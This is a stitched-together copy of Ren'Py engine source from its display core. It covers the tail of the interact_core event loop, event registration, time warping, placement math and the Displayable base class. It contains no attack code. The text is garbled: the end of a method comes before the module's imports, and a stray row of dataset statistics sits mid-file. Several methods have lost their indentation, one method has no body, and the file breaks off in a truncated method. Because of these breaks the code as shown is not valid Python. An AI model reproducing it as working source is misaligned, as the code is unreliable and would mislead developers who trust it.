                    result = None

                if result is None:
                    self.prediction_coroutine = None
                    step += 1

                elif result is False:
                    if not expensive:
                        step += 1

            # Step 4: Preload images (on emscripten)
            elif step == 4:

                if expensive and renpy.emscripten:
                    renpy.display.im.cache.preload_thread_pass()

                step += 1

            # Step 5: Autosave.
            elif step == 5:

                if not self.did_autosave:
                    renpy.loadsave.autosave()
                    renpy.persistent.check_update()
                    self.did_autosave = True

                step += 1

            else:
                break

        if expensive:
            renpy.plog(1, "end idle_frame (expensive)")
        else:
            renpy.plog(1, "end idle_frame (inexpensive)")
    def interact_core(self,
                      show_mouse=True,
                      trans_pause=False,
                      suppress_overlay=False,
                      suppress_underlay=False,
                      mouse='default',
                      preloads=[],
                      roll_forward=None,
                      ):
        """
        This handles one cycle of displaying an image to the user,
        and then responding to user input.

        @param show_mouse: Should the mouse be shown during this
        interaction? Only advisory, and usually doesn't work.

        @param trans_pause: If given, we must have a transition. Should we
        add a pause behavior during the transition?

        @param suppress_overlay: This suppresses the display of the overlay.
        @param suppress_underlay: This suppresses the display of the underlay.

        Returns a (restart, result) pair: when `restart` is true the caller
        should re-run the interaction, otherwise `result` is the value that
        ended it.

        NOTE(review): `preloads=[]` is a mutable default argument; it is
        only read here, but confirm no caller mutates the shared list.
        """

        renpy.plog(1, "start interact_core")

        suppress_overlay = suppress_overlay or renpy.store.suppress_overlay

        # Store the various parameters.
        self.suppress_overlay = suppress_overlay
        self.suppress_underlay = suppress_underlay
        self.trans_pause = trans_pause

        # Show default screens.
        renpy.display.screen.show_overlay_screens(suppress_overlay)

        # Prepare screens, if need be.
        renpy.display.screen.prepare_screens()

        self.roll_forward = roll_forward
        self.show_mouse = show_mouse

        suppress_transition = renpy.config.skipping or renpy.game.less_updates

        # The global one.
        self.suppress_transition = False

        # Figure out transitions.
        if suppress_transition:
            self.ongoing_transition.clear()
            self.transition_from.clear()
            self.transition_time.clear()
        else:
            for k in self.transition:
                if k not in self.old_scene:
                    continue

                self.ongoing_transition[k] = self.transition[k]
                self.transition_from[k] = self.old_scene[k]._in_current_store()
                self.transition_time[k] = None

            self.transition.clear()

        # Safety condition, prevents deadlocks.
        if trans_pause:
            if not self.ongoing_transition:
                return False, None

            if None not in self.ongoing_transition:
                return False, None

            if suppress_transition:
                return False, None

            if not self.old_scene:
                return False, None

        # Check to see if the language has changed.
        renpy.translation.check_language()

        # We just restarted.
        self.restart_interaction = False

        # Setup the mouse.
        self.mouse = mouse

        # The start and end times of this interaction.
        start_time = get_time()
        end_time = start_time

        # frames = 0

        for i in renpy.config.interact_callbacks:
            i()

        # Set the window caption.
        self.set_window_caption()

        # Tick time forward.
        renpy.display.im.cache.tick()
        renpy.text.text.text_tick()
        renpy.display.predict.reset()

        # Clear the size groups.
        renpy.display.layout.size_groups.clear()

        # Clear the set of updated screens.
        renpy.display.screen.updated_screens.clear()

        # Clear some events.
        pygame.event.clear((pygame.MOUSEMOTION,
                            PERIODIC,
                            TIMEEVENT,
                            REDRAW))

        # Add a single TIMEEVENT to the queue.
        self.post_time_event()

        # Figure out the scene list we want to show.
        scene_lists = renpy.game.context().scene_lists

        # Remove the now-hidden things.
        scene_lists.remove_hidden()

        # Compute the overlay.
        if not suppress_overlay:
            self.compute_overlay()

        # The root widget of everything that is displayed on the screen.
        root_widget = renpy.display.layout.MultiBox(layout='fixed')
        root_widget.layers = { }

        # A list of widgets that are roots of trees of widgets that are
        # considered for focusing.
        focus_roots = [ ]

        # Add the underlay to the root widget.
        if not suppress_underlay:
            for i in renpy.config.underlay:
                root_widget.add(i)
                focus_roots.append(i)

        if roll_forward is not None:
            rfw = renpy.display.behavior.RollForward(roll_forward)
            root_widget.add(rfw)
            focus_roots.append(rfw)

        # Figure out the scene. (All of the layers, and the root.)
        scene = self.compute_scene(scene_lists)
        renpy.display.tts.set_root(scene[None])

        renpy.plog(1, "computed scene")

        # If necessary, load all images here.
        for w in scene.itervalues():
            try:
                renpy.display.predict.displayable(w)
            except:
                pass

        renpy.plog(1, "final predict")

        # The root widget of all of the layers.
        layers_root = renpy.display.layout.MultiBox(layout='fixed')
        layers_root.layers = { }

        def add_layer(where, layer):
            # Adds `layer` from the scene to `where`, wrapping it in that
            # layer's ongoing transition when one is active.

            scene_layer = scene[layer]
            focus_roots.append(scene_layer)

            if (self.ongoing_transition.get(layer, None) and
                    not suppress_transition):

                trans = self.ongoing_transition[layer](
                    old_widget=self.transition_from[layer],
                    new_widget=scene_layer)

                if not isinstance(trans, Displayable):
                    raise Exception("Expected transition to be a displayable, not a %r" % trans)

                transition_time = self.transition_time.get(layer, None)

                where.add(trans, transition_time, transition_time)
                where.layers[layer] = trans

            else:
                where.layers[layer] = scene_layer
                where.add(scene_layer)

        # Add layers (perhaps with transitions) to the layers root.
        for layer in renpy.config.layers:
            add_layer(layers_root, layer)

        # Add layers_root to root_widget, perhaps through a transition.
        if (self.ongoing_transition.get(None, None) and
                not suppress_transition):

            old_root = renpy.display.layout.MultiBox(layout='fixed')
            old_root.layers = { }

            for layer in renpy.config.layers:
                d = self.transition_from[None].layers[layer]
                old_root.layers[layer] = d
                old_root.add(d)

            trans = self.ongoing_transition[None](
                old_widget=old_root,
                new_widget=layers_root)

            if not isinstance(trans, Displayable):
                raise Exception("Expected transition to be a displayable, not a %r" % trans)

            trans._show()

            transition_time = self.transition_time.get(None, None)
            root_widget.add(trans, transition_time, transition_time)

            if trans_pause:

                if renpy.store._dismiss_pause:
                    sb = renpy.display.behavior.SayBehavior()
                else:
                    sb = renpy.display.behavior.SayBehavior(dismiss='dismiss_hard_pause')

                root_widget.add(sb)
                focus_roots.append(sb)

                pb = renpy.display.behavior.PauseBehavior(trans.delay)
                root_widget.add(pb, transition_time, transition_time)
                focus_roots.append(pb)

        else:
            root_widget.add(layers_root)

        # Add top_layers to the root_widget.
        for layer in renpy.config.top_layers:
            add_layer(root_widget, layer)

        for i in renpy.display.emulator.overlay:
            root_widget.add(i)

        del add_layer

        self.prediction_coroutine = renpy.display.predict.prediction_coroutine(root_widget)
        self.prediction_coroutine.send(None)

        # Clean out the registered adjustments.
        renpy.display.behavior.adj_registered.clear()

        # Clean up some movie-related things.
        renpy.display.video.early_interact()

        # Call per-interaction code for all widgets.
        renpy.display.behavior.input_pre_per_interact()
        root_widget.visit_all(lambda i : i.per_interact())
        renpy.display.behavior.input_post_per_interact()

        # Now, update various things regarding scenes and transitions,
        # so we are ready for a new interaction or a restart.
        self.old_scene = scene

        # Okay, from here on we now have a single root widget (root_widget),
        # which we will try to show to the user.

        # Figure out what should be focused.
        renpy.display.focus.before_interact(focus_roots)

        # Something updated the screens. Deal with it now, so the player doesn't
        # see it.
        if self.restart_interaction:
            return True, None

        # Redraw the screen.
        needs_redraw = True

        # First pass through the while loop?
        first_pass = True

        # We don't yet know when the interaction began.
        self.interact_time = None

        # We only want to do autosave once.
        self.did_autosave = False

        old_timeout_time = None
        old_redraw_time = None

        rv = None

        # Start sound.
        renpy.audio.audio.interact()

        # How long until we redraw.
        _redraw_in = 3600

        # Have we drawn a frame yet?
        video_frame_drawn = False

        # We're no longer after rollback.
        renpy.game.after_rollback = False

        # How many frames have we shown so far?
        frame = 0

        can_block = False

        # This try block is used to force cleanup even on termination
        # caused by an exception propagating through this function.
        try:

            while rv is None:

                renpy.plog(1, "start of interact while loop")

                renpy.execution.not_infinite_loop(10)

                # Check for a change in fullscreen preference.
                if ((self.fullscreen != renpy.game.preferences.fullscreen) or
                        self.display_reset or (renpy.display.draw is None)):

                    self.set_mode()
                    needs_redraw = True

                # Check for autoreload.
                if renpy.loader.needs_autoreload:
                    renpy.loader.needs_autoreload = False
                    renpy.exports.reload_script()

                for i in renpy.config.needs_redraw_callbacks:
                    if i():
                        needs_redraw = True

                # Redraw the screen.
                if (self.force_redraw or
                        ((first_pass or not pygame.event.peek(ALL_EVENTS)) and
                         renpy.display.draw.should_redraw(needs_redraw, first_pass, can_block))):

                    self.force_redraw = False

                    renpy.display.render.process_redraws()

                    # If we have a movie, start showing it.
                    fullscreen_video = renpy.display.video.interact()

                    # Clean out the redraws, if we have to.
                    # renpy.display.render.kill_redraws()

                    self.text_rect = None

                    # Draw the screen.
                    self.frame_time = get_time()

                    renpy.audio.audio.advance_time() # Sets the time of all video frames.

                    self.draw_screen(root_widget, fullscreen_video, (not fullscreen_video) or video_frame_drawn)

                    if first_pass:
                        if not self.interact_time:
                            self.interact_time = max(self.frame_time, get_time() - self.frame_duration)

                        scene_lists.set_times(self.interact_time)

                        for k, v in self.transition_time.iteritems():
                            if v is None:
                                self.transition_time[k] = self.interact_time

                        renpy.display.render.adjust_render_cache_times(self.frame_time, self.interact_time)

                    frame += 1
                    renpy.config.frames += 1

                    # If profiling is enabled, report the profile time.
                    if renpy.config.profile or self.profile_once:

                        renpy.plog(0, "end frame")
                        renpy.performance.analyze()
                        renpy.performance.clear()
                        renpy.plog(0, "start frame")

                        self.profile_once = False

                    if first_pass and self.last_event and self.last_event.type in [ pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION ]:

                        x, y = renpy.display.draw.get_mouse_pos()
                        ev, x, y = renpy.display.emulator.emulator(self.last_event, x, y)

                        if self.ignore_touch:
                            x = -1
                            y = -1

                        if renpy.android and self.last_event.type == pygame.MOUSEBUTTONUP:
                            x = -1
                            y = -1

                        renpy.display.focus.mouse_handler(None, x, y, default=False)

                    needs_redraw = False
                    first_pass = False

                    pygame.time.set_timer(REDRAW, 0)
                    pygame.event.clear([REDRAW])
                    old_redraw_time = None

                    self.update_text_rect()

                    renpy.test.testexecution.execute()

                # Move the mouse, if necessary.
                if self.mouse_move is not None:
                    if not self.mouse_move.perform():
                        self.mouse_move = None

                # Draw the mouse, if it needs drawing.
                renpy.display.draw.update_mouse()

                # See if we want to restart the interaction entirely.
                if self.restart_interaction:
                    return True, None

                # Determine if we need a redraw. (We want to run these
                # functions, so we put them first to prevent short-circuiting.)

                if renpy.display.video.frequent():
                    needs_redraw = True
                    video_frame_drawn = True

                if renpy.display.render.check_redraws():
                    needs_redraw = True

                # How many seconds until we timeout.
                _timeout_in = 3600

                # Handle the redraw timer.
                redraw_time = renpy.display.render.redraw_time()

                # We only need to set the REDRAW timer if we can block.
                can_block = renpy.display.draw.can_block()

                if self.maximum_framerate_time > get_time():
                    can_block = False

                if (redraw_time is not None) and (not needs_redraw) and can_block:

                    if redraw_time != old_redraw_time:

                        time_left = redraw_time - get_time()
                        time_left = min(time_left, 3600)
                        _redraw_in = time_left

                        if time_left <= 0:
                            try:
                                pygame.event.post(self.redraw_event)
                            except:
                                pass
                            pygame.time.set_timer(REDRAW, 0)
                        else:
                            pygame.time.set_timer(REDRAW, max(int(time_left * 1000), 1))

                        old_redraw_time = redraw_time
                else:
                    _redraw_in = 3600
                    pygame.time.set_timer(REDRAW, 0)

                # Handle the timeout timer.
                if not self.timeout_time:
                    pygame.time.set_timer(TIMEEVENT, 0)
                else:
                    time_left = self.timeout_time - get_time()
                    time_left = min(time_left, 3600)
                    _timeout_in = time_left

                    if time_left <= 0:
                        self.timeout_time = None
                        pygame.time.set_timer(TIMEEVENT, 0)
                        self.post_time_event()
                    elif self.timeout_time != old_timeout_time:
                        # Always set to at least 1ms.
                        pygame.time.set_timer(TIMEEVENT, int(time_left * 1000 + 1))
                        old_timeout_time = self.timeout_time

                if can_block or (frame >= renpy.config.idle_frame):
                    expensive = not ( needs_redraw or (_redraw_in < .2) or (_timeout_in < .2) or renpy.display.video.playing() )
                    self.idle_frame(can_block, expensive)

                if needs_redraw or (not can_block) or self.mouse_move or renpy.display.video.playing():
                    renpy.plog(1, "pre peek")
                    ev = self.event_poll()
                    renpy.plog(1, "post peek {!r}", ev)
                else:
                    renpy.plog(1, "pre wait")
                    ev = self.event_wait()
                    renpy.plog(1, "post wait {!r}", ev)

                if ev.type == pygame.NOEVENT:

                    if can_block and (not needs_redraw) and (not self.prediction_coroutine) and (not self.mouse_move):
                        pygame.time.wait(1)

                    continue

                # Recognize and ignore AltGr on Windows.
                if ev.type == pygame.KEYDOWN:
                    if ev.key == pygame.K_LCTRL:

                        ev2 = self.event_peek()

                        if (ev2 is not None) and (ev2.type == pygame.KEYDOWN):
                            if ev2.key == pygame.K_RALT:
                                continue

                # Check to see if the OS is asking us to suspend (on Android
                # and iOS.)
                if self.check_suspend(ev):
                    continue

                # Try to merge an TIMEEVENT with other timeevents.
                if ev.type == TIMEEVENT:
                    old_timeout_time = None
                    pygame.event.clear([TIMEEVENT])

                # On Android, where we have multiple mouse buttons, we can
                # merge a mouse down and mouse up event with its successor. This
                # prevents us from getting overwhelmed with too many events on
                # a multitouch screen.
                if android and (ev.type == pygame.MOUSEBUTTONDOWN or ev.type == pygame.MOUSEBUTTONUP):
                    pygame.event.clear(ev.type)

                # Handle redraw timeouts.
                if ev.type == REDRAW:
                    pygame.event.clear([REDRAW])
                    old_redraw_time = None
                    continue

                # Handle periodic events. This includes updating the mouse timers (and through the loop,
                # the mouse itself), and the audio system periodic calls.
                if ev.type == PERIODIC:
                    events = 1 + len(pygame.event.get([PERIODIC]))
                    self.ticks += events

                    for i in renpy.config.periodic_callbacks:
                        i()

                    renpy.audio.audio.periodic()
                    renpy.display.tts.periodic()
                    continue

                # Handle quit specially for now.
                if ev.type == pygame.QUIT:
                    self.quit_event()
                    continue

                # Ignore KEY-events while text is being edited (usually with an IME).
                if ev.type == pygame.TEXTEDITING:
                    if ev.text:
                        self.text_editing = ev
                    else:
                        self.text_editing = None

                elif ev.type == pygame.TEXTINPUT:
                    self.text_editing = None

                elif self.text_editing and ev.type in [ pygame.KEYDOWN, pygame.KEYUP ]:
                    continue

                if ev.type == pygame.VIDEOEXPOSE:
                    # Needed to force the display to redraw after expose in
                    # the software renderer.
                    renpy.game.interface.full_redraw = True
                    renpy.game.interface.force_redraw = True

                    if isinstance(renpy.display.draw, renpy.display.swdraw.SWDraw):
                        renpy.display.draw.full_redraw = True

                    continue

                # Handle videoresize.
                if ev.type == pygame.VIDEORESIZE:

                    evs = pygame.event.get([pygame.VIDEORESIZE])

                    if len(evs):
                        ev = evs[-1]

                    # We seem to get a spurious event like this when leaving
                    # fullscreen mode on windows.
                    if ev.w < 256 or ev.h < 256:
                        continue

                    size = (ev.w // self.dpi_scale, ev.h // self.dpi_scale)

                    # Refresh fullscreen status (e.g. user pressed Esc. in browser)
                    main_window = pygame.display.get_window()
                    self.fullscreen = main_window is not None and bool(main_window.get_window_flags() & (pygame.WINDOW_FULLSCREEN_DESKTOP|pygame.WINDOW_FULLSCREEN))
                    renpy.game.preferences.fullscreen = self.fullscreen

                    if pygame.display.get_surface().get_size() != ev.size:
                        self.set_mode(size)

                    if not self.fullscreen:
                        self.last_resize = size

                    continue

                # If we're ignoring touch events, and get a mouse up, stop
                # ignoring those events.
                if self.ignore_touch and \
                        ev.type == pygame.MOUSEBUTTONUP and \
                        ev.button == 1:

                    self.ignore_touch = False
                    continue

                # Merge mousemotion events.
                if ev.type == pygame.MOUSEMOTION:
                    evs = pygame.event.get([pygame.MOUSEMOTION])

                    if len(evs):
                        ev = evs[-1]

                    if renpy.windows:
                        self.mouse_focused = True

                # Handle mouse event time, and ignoring touch.
                if ev.type == pygame.MOUSEMOTION or \
                        ev.type == pygame.MOUSEBUTTONDOWN or \
                        ev.type == pygame.MOUSEBUTTONUP:

                    self.mouse_event_time = renpy.display.core.get_time()

                    if self.ignore_touch:
                        renpy.display.focus.mouse_handler(None, -1, -1, default=False)

                # Handle focus notifications.
                if ev.type == pygame.ACTIVEEVENT:

                    if ev.state & 1:
                        if not ev.gain:
                            renpy.display.focus.clear_focus()

                        self.mouse_focused = ev.gain

                    if ev.state & 2:
                        self.keyboard_focused = ev.gain

                    if ev.state & 4:
                        if ev.gain:
                            self.restored()
                        else:
                            self.iconified()

                    pygame.key.set_mods(0)

                # This returns the event location. It also updates the
                # mouse state as necessary.
                x, y = renpy.display.draw.mouse_event(ev)
                x, y = renpy.test.testmouse.get_mouse_pos(x, y)

                ev, x, y = renpy.display.emulator.emulator(ev, x, y)
                if ev is None:
                    continue

                if not self.mouse_focused or self.ignore_touch:
                    x = -1
                    y = -1

                # This can set the event to None, to ignore it.
                ev = renpy.display.controller.event(ev)
                if not ev:
                    continue

                # Handle skipping.
                renpy.display.behavior.skipping(ev)

                self.event_time = end_time = get_time()

                try:

                    if self.touch:
                        renpy.display.gesture.recognizer.event(ev, x, y) # @UndefinedVariable

                    # Handle the event normally.
                    rv = renpy.display.focus.mouse_handler(ev, x, y)

                    if rv is None:
                        rv = root_widget.event(ev, x, y, 0)

                    if rv is None:
                        rv = renpy.display.focus.key_handler(ev)

                    if rv is not None:
                        break

                    # Handle displayable inspector.
                    if renpy.config.inspector:
                        if renpy.display.behavior.map_event(ev, "inspector"):
                            l = self.surftree.main_displayables_at_point(x, y, renpy.config.transient_layers + renpy.config.context_clear_layers + renpy.config.overlay_layers)
                            renpy.game.invoke_in_new_context(renpy.config.inspector, l)
                        elif renpy.display.behavior.map_event(ev, "full_inspector"):
                            l = self.surftree.main_displayables_at_point(x, y, renpy.config.layers)
                            renpy.game.invoke_in_new_context(renpy.config.inspector, l)

                except IgnoreEvent:
                    # An ignored event can change the timeout. So we want to
                    # process an TIMEEVENT to ensure that the timeout is
                    # set correctly
                    if ev.type != TIMEEVENT:
                        self.post_time_event()

                # Check again after handling the event.
                needs_redraw |= renpy.display.render.check_redraws()

                if self.restart_interaction:
                    return True, None

            # If we were trans-paused and rv is true, suppress
            # transitions up to the next interaction.
            if trans_pause and rv:
                self.suppress_transition = True

            # But wait, there's more! The finally block runs some cleanup
            # after this.
            return False, rv

        except EndInteraction as e:
            return False, e.value

        finally:

            renpy.game.context().say_attributes = None

            # Clean out the overlay layers.
            for i in renpy.config.overlay_layers:
                scene_lists.clear(i)

            # Stop ongoing preloading.
            renpy.display.im.cache.end_tick()

            # We no longer disable periodic between interactions.
            # pygame.time.set_timer(PERIODIC, 0)

            pygame.time.set_timer(TIMEEVENT, 0)
            pygame.time.set_timer(REDRAW, 0)

            self.consider_gc()

            renpy.game.context().runtime += end_time - start_time

            # Restart the old interaction, which also causes a
            # redraw if needed.
            self.restart_interaction = True

            renpy.plog(1, "end interact_core")

        # print("It took", frames, "frames.")
def timeout(self, offset):
if offset < 0:
return
if self.timeout_time:
self.timeout_time = min(self.event_time + offset, self.timeout_time)
else:
self.timeout_time = self.event_time + offset
    def finish_pending(self):
        """
        Called before a quit or restart to finish any pending work that
        might block other threads (currently, the background screenshot).
        """
        self.check_background_screenshot()
| 29.801997 | 175 | 0.56845 |
from __future__ import print_function
import renpy.display
import renpy.audio
import renpy.text
import renpy.test
import pygame_sdl2 as pygame
import sys
import os
import time
import cStringIO
import threading
import copy
import gc
import inspect
import_time = time.time()
try:
import android
except:
android = None
# Interface-private event types, registered with pygame_sdl2.
TIMEEVENT = pygame.event.register("TIMEEVENT")
PERIODIC = pygame.event.register("PERIODIC")
REDRAW = pygame.event.register("REDRAW")
EVENTNAME = pygame.event.register("EVENTNAME")

# Every event type the interaction loop may see: the standard pygame
# events plus our custom ones.
ALL_EVENTS = set(pygame.event.get_standard_events())
ALL_EVENTS.add(PERIODIC)
ALL_EVENTS.add(EVENTNAME)

# The set of event types the interface enables. (NOTE(review): consumed
# outside this chunk - presumably passed to pygame's allowed-events
# filter; confirm.)
enabled_events = {
    pygame.QUIT,

    pygame.APP_TERMINATING,
    pygame.APP_LOWMEMORY,
    pygame.APP_WILLENTERBACKGROUND,
    pygame.APP_DIDENTERBACKGROUND,
    pygame.APP_WILLENTERFOREGROUND,
    pygame.APP_DIDENTERFOREGROUND,

    pygame.WINDOWEVENT,
    pygame.SYSWMEVENT,

    pygame.KEYDOWN,
    pygame.KEYUP,

    pygame.TEXTEDITING,
    pygame.TEXTINPUT,

    pygame.MOUSEMOTION,
    pygame.MOUSEBUTTONDOWN,
    pygame.MOUSEBUTTONUP,
    pygame.MOUSEWHEEL,

    pygame.JOYAXISMOTION,
    pygame.JOYHATMOTION,
    pygame.JOYBALLMOTION,
    pygame.JOYBUTTONDOWN,
    pygame.JOYBUTTONUP,
    pygame.JOYDEVICEADDED,
    pygame.JOYDEVICEREMOVED,

    pygame.CONTROLLERAXISMOTION,
    pygame.CONTROLLERBUTTONDOWN,
    pygame.CONTROLLERBUTTONUP,
    pygame.CONTROLLERDEVICEADDED,
    pygame.CONTROLLERDEVICEREMOVED,

    pygame.RENDER_TARGETS_RESET,

    TIMEEVENT,
    PERIODIC,
    REDRAW,
    EVENTNAME,
    }

# How often, in milliseconds, PERIODIC events fire.
PERIODIC_INTERVAL = 50

# The warped-clock state used by init_time() and get_time().
time_base = 0.0
time_mult = 1.0
def init_time():
    """
    Initializes the warped clock used by get_time(). The RENPY_TIMEWARP
    environment variable supplies the speed multiplier (default 1.0).
    """

    global time_base
    global time_mult

    time_base = time.time()
    time_mult = float(os.environ.get("RENPY_TIMEWARP", "1.0"))
def get_time():
    """
    Returns the current time on the (possibly warped) interface clock:
    real time scaled by time_mult around the time_base origin.
    """
    now = time.time()
    return time_base + (now - time_base) * time_mult
def displayable_by_tag(layer, tag):
    """
    Returns the displayable shown on `layer` under `tag`, looked up in the
    current context's scene lists.
    """
    return renpy.game.context().scene_lists.get_displayable_by_tag(layer, tag)
class IgnoreEvent(Exception):
    """
    Raised by event handlers to stop processing of the current event; the
    interaction's event loop catches it and continues.
    """

    pass
class EndInteraction(Exception):
    """
    Raised to end the current interaction immediately, with `value` as its
    result (caught in interact_core).
    """

    def __init__(self, value):
        self.value = value
class absolute(float):
    """
    A float subclass marking a coordinate as absolute pixels: place()
    scales plain floats by the area size, but its exact-type check fails
    for this subclass, so absolute values pass through unscaled.
    """

    __slots__ = [ ]
def place(width, height, sw, sh, placement):
    """
    Computes where a surface of size (sw, sh) goes inside an area of size
    (width, height). `placement` is a (xpos, ypos, xanchor, yanchor,
    xoffset, yoffset, subpixel) tuple; None entries default to 0. Exact
    floats are fractions of the relevant dimension, while ints (and the
    `absolute` float subclass) are pixel values. Returns (x, y).
    """

    xpos, ypos, xanchor, yanchor, xoffset, yoffset, _subpixel = placement

    xpos = 0 if xpos is None else xpos
    ypos = 0 if ypos is None else ypos
    xanchor = 0 if xanchor is None else xanchor
    yanchor = 0 if yanchor is None else yanchor
    xoffset = 0 if xoffset is None else xoffset
    yoffset = 0 if yoffset is None else yoffset

    # Exact-type checks, so that the absolute subclass of float stays in
    # pixels rather than being scaled.
    if type(xpos) is float:
        xpos *= width
    if type(xanchor) is float:
        xanchor *= sw

    if type(ypos) is float:
        ypos *= height
    if type(yanchor) is float:
        yanchor *= sh

    x = xpos + xoffset - xanchor
    y = ypos + yoffset - yanchor

    return x, y
class DisplayableArguments(renpy.object.Object):
    """
    Records how a displayable was parameterized: the image name, the extra
    argument strings, an optional style prefix, and a lint flag.
    """

    # The image name, as a tuple of strings.
    name = ()

    # The argument strings supplied along with the name.
    args = ()

    # An optional style prefix. (NOTE(review): set elsewhere - confirm.)
    prefix = None

    # True when running under lint.
    lint = False

    def copy(self, **kwargs):
        """Returns a copy of this object, with fields overridden by `kwargs`."""
        rv = DisplayableArguments()

        merged = dict(self.__dict__)
        merged.update(kwargs)
        rv.__dict__.update(merged)

        return rv

    def extraneous(self):
        """In developer mode, complains that `args` were given to an image that takes none."""
        if not (renpy.config.developer and renpy.config.report_extraneous_attributes):
            return

        message = "Image '{}' does not accept attributes '{}'.".format(
            " ".join(self.name),
            " ".join(self.args),
        )
        raise Exception(message)
# The single shared Style("default") instance, reused by Displayable.__init__
# whenever no style customization is requested.
default_style = renpy.style.Style("default")
class Displayable(renpy.object.Object):
    """
    The base class for objects that can be displayed on a layer. Subclasses
    override render(), event(), visit(), and the various hooks below.
    """

    # Method-ordering invariant: get_placement can be called at any time,
    # so it can't assume anything. (NOTE(review): the original comment here
    # was truncated to "# assume anything." - restored from context.)

    # If True this displayable can accept focus.
    # If False, it can't, but it keeps its place in the focus order.
    # (None means it does not participate in focus at all.)
    focusable = None

    # The full focus name, filled in by the focus machinery elsewhere.
    full_focus_name = None

    # The style-prefix role ('' or e.g. 'selected_') prepended when
    # switching prefixes in focus()/unfocus().
    role = ''

    # The name of the last transform event delivered via
    # set_transform_event().
    transform_event = None

    # Can we change our look in response to transform_events?
    transform_event_responder = False

    # The main displayable, if this displayable is the root of a composite
    # displayable. (This is used by SL to figure out where to add children
    # to.) If None, it is itself.
    _main = None

    # A list of the children that make up this composite displayable.
    _composite_parts = [ ]

    # The location the displayable was created at, if known.
    _location = None

    # Does this displayable use the scope?
    _uses_scope = False

    # Arguments supplied to this displayable.
    _args = DisplayableArguments()

    # Set to true of the displayable is duplicatable (has a non-trivial
    # duplicate method), or one of its children is.
    _duplicatable = False

    # Does this displayable require clipping?
    _clipping = False

    # Does this displayable have a tooltip?
    _tooltip = None
    def __ne__(self, o):
        """Inequality is the negation of ``==`` (needed explicitly on Python 2)."""
        return not (self == o)
def __init__(self, focus=None, default=False, style='default', _args=None, tooltip=None, default_focus=False, **properties):
global default_style
if (style == "default") and (not properties):
self.style = default_style
else:
self.style = renpy.style.Style(style, properties) # @UndefinedVariable
self.focus_name = focus
self.default = default or default_focus
self._tooltip = tooltip
if _args is not None:
self._args = _args
def _copy(self, args=None):
rv = copy.copy(self)
if args is not None:
rv._args = args
return rv
def _duplicate(self, args):
if args and args.args:
args.extraneous()
return self
    def _get_tooltip(self):
        """Returns the tooltip value supplied at construction time, or None."""
        return self._tooltip
    def _in_current_store(self):
        """
        Returns a version of this displayable that will not change as it
        is rendered; the base implementation returns itself unchanged.
        """
        return self
    def _unique(self):
        """
        A hook called by the duplication machinery; the base implementation
        does nothing.
        """
        return
def parameterize(self, name, parameters):
a = self._args.copy(name=name, args=parameters)
return self._duplicate(a)
def _equals(self, o):
if type(self) is not type(o):
return False
if self.focus_name != o.focus_name:
return False
if self.style != o.style:
return False
if self.default != o.default:
return False
return True
    def __unicode__(self):
        """Returns the class name (Python 2 unicode protocol; used by __repr__)."""
        return self.__class__.__name__
    def __repr__(self):
        # `unicode` is Python 2 only - this module targets py2.
        return "<{} at {:x}>".format(unicode(self).encode("utf-8"), id(self))
def find_focusable(self, callback, focus_name):
focus_name = self.focus_name or focus_name
if self.focusable:
callback(self, focus_name)
elif self.focusable is not None:
callback(None, focus_name)
for i in self.visit():
if i is None:
continue
i.find_focusable(callback, focus_name)
    def focus(self, default=False):
        """
        Called when this widget gains focus: switches to the hover style
        prefix, and plays the hover sound unless this is a default focus.
        """
        self.set_style_prefix(self.role + "hover_", True)

        if not default:
            renpy.exports.play(self.style.hover_sound)
    def unfocus(self, default=False):
        """
        Called when this widget loses focus: switches back to the idle
        style prefix. `default` mirrors focus() and is unused here.
        """
        self.set_style_prefix(self.role + "idle_", True)
    def is_focused(self):
        """
        Returns true if this displayable holds the focus. Returns None
        while another displayable holds the focus grab.
        """
        if renpy.display.focus.grab and renpy.display.focus.grab is not self:
            return
        return renpy.game.context().scene_lists.focused is self
    def set_style_prefix(self, prefix, root):
        """
        Sets the style prefix (e.g. "hover_", "idle_") and schedules a
        redraw — unless that prefix is already in effect.
        """
        if prefix == self.style.prefix:
            return
        self.style.set_prefix(prefix)
        renpy.display.render.redraw(self, 0)
    def render(self, width, height, st, at):
        """
        Renders this displayable at width x height, with shown time `st`
        and animation time `at`. Subclasses must override; the base
        implementation raises.
        """
        raise Exception("Render not implemented.")
    def event(self, ev, x, y, st):
        """
        Handles event `ev` at (x, y). Returning None means the event was
        ignored; the base class ignores everything.
        """
        return None
    def get_placement(self):
        """Returns the placement tuple from this displayable's style."""
        return self.style.get_placement()
    def visit_all(self, callback, seen=None):
        """
        Calls `callback` on this displayable and every displayable
        reachable through visit(), each at most once (deduplicated by
        object id).
        """
        if seen is None:
            seen = set()
        for d in self.visit():
            if d is None:
                continue
            id_d = id(d)
            if id_d in seen:
                continue
            seen.add(id_d)
            d.visit_all(callback, seen)
        callback(self)
    def visit(self):
        """
        Returns this displayable's children (entries may be None). The
        base class has none.
        """
        return [ ]
    def per_interact(self):
        """Called once per interaction; a no-op in the base class."""
        return None
    def predict_one(self):
        """Prediction hook; the base class does nothing."""
        return
    def predict_one_action(self):
        """Action-prediction hook; the base class does nothing."""
        return
    def place(self, dest, x, y, width, height, surf, main=True):
        """
        Positions rendered surface `surf` inside the (x, y, width,
        height) area of `dest`, honoring this displayable's placement
        style (index 6 of the placement tuple selects subpixel
        positioning), and blits it there. Returns the (xpos, ypos)
        used. If `dest` is None, only the position is computed.
        """
        placement = self.get_placement()
        subpixel = placement[6]
        xpos, ypos = place(width, height, surf.width, surf.height, placement)
        xpos += x
        ypos += y
        pos = (xpos, ypos)
        if dest is not None:
            if subpixel:
                dest.subpixel_blit(surf, pos, main, main, None)
            else:
                dest.blit(surf, pos, main, main, None)
        return pos
    def set_transform_event(self, event):
        """
        Records the transform event (e.g. "show", "replace"), scheduling
        a redraw when this displayable responds to transform events.
        """
        if event == self.transform_event:
            return
        self.transform_event = event
        if self.transform_event_responder:
            renpy.display.render.redraw(self, 0)
    def _handles_event(self, event):
        """Returns true if this displayable handles `event`; base: no."""
        return False
    def _hide(self, st, at, kind):
        """
        Called when this displayable is hidden or replaced. Returning a
        displayable keeps it on the layer (e.g. to finish an animation);
        the base class returns None, removing it immediately.
        """
        return None
def _show(self):
def _target(self):
return self
    def _change_transform_child(self, child):
        """
        Called when a transform's child is replaced; the base class
        returns the new child unchanged.
        """
        return child
    def _clear(self):
        """State-clearing hook; the base class does nothing."""
        return
    def _tts_common(self, default_alt=None):
        """
        Builds self-voicing text by joining the children's _tts() output
        with ": " and collapsing doubled colons. If the style's alt text
        (or `default_alt`) is set, the joined text is substituted into
        it as {text}.
        """
